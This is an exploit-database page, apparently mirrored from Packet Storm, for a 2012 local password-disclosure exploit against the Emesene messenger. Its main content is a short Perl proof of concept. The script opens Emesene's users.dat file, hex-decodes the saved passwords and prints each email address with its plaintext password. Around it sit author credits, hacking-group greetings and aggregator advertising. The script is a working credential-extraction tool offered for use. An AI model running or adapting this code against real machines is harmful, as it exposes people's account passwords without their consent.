Lucene search

K

Emesene 2.12.5 Password Disclosure

🗓️ 02 Jul 2012 00:00:00Reported by Daniel GodoyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 10 Views

Emesene 2.12.5 Password Disclosure, Linux, Perl script, MailMonstru

Show more
Code
`# Exploit Title: Emesene Password Disclosure  
# Category: Local  
# Date: 29/06/2012  
# Author: Daniel Godoy  
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com  
# Author Web: www.delincuentedigital.com.ar  
# Sofware web: http://blog.emesene.org/p/downloads.html  
# Tested on: Linux  
  
The only requirement to run the script is that the customer is  
highlighted remember password.  
  
[Comment]  
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,  
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,  
InyeXion, ksha, zerial,LinuxFer, Scorp  
her0, r0dr1 y demas user de RemoteExecution  
www.remoteexecution.info www.remoteexcution.com.ar  
#RemoteExecution Hacking Group  
  
[PoC]  
  
#!/usr/bin/perl  
#/home/$HOME/.config/emesene1.0  
system("clear");  
print "[ EMESENE PASSWORD DISCLOSURE ]\n";  
print "TESTED ON UBUNTU 10.04 LTS\n";  
my $pwn="users.dat";  
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";  
$cantidad++ while <ENTRADA>;  
close (ENTRADA);  
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";  
@source = <ENTRADA>;  
for($i = 0; $i < $cantidad; $i++)  
{  
@password= split(":", $source[$i]);  
print "Mail: ".$password[0]." Password PWND! => ";  
print pack("H*", $password[1]), "\n";   
}  
close (ENTRADA);  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Jul 2012 00:00Current
7.4High risk
Vulners AI Score7.4
10
.json
Report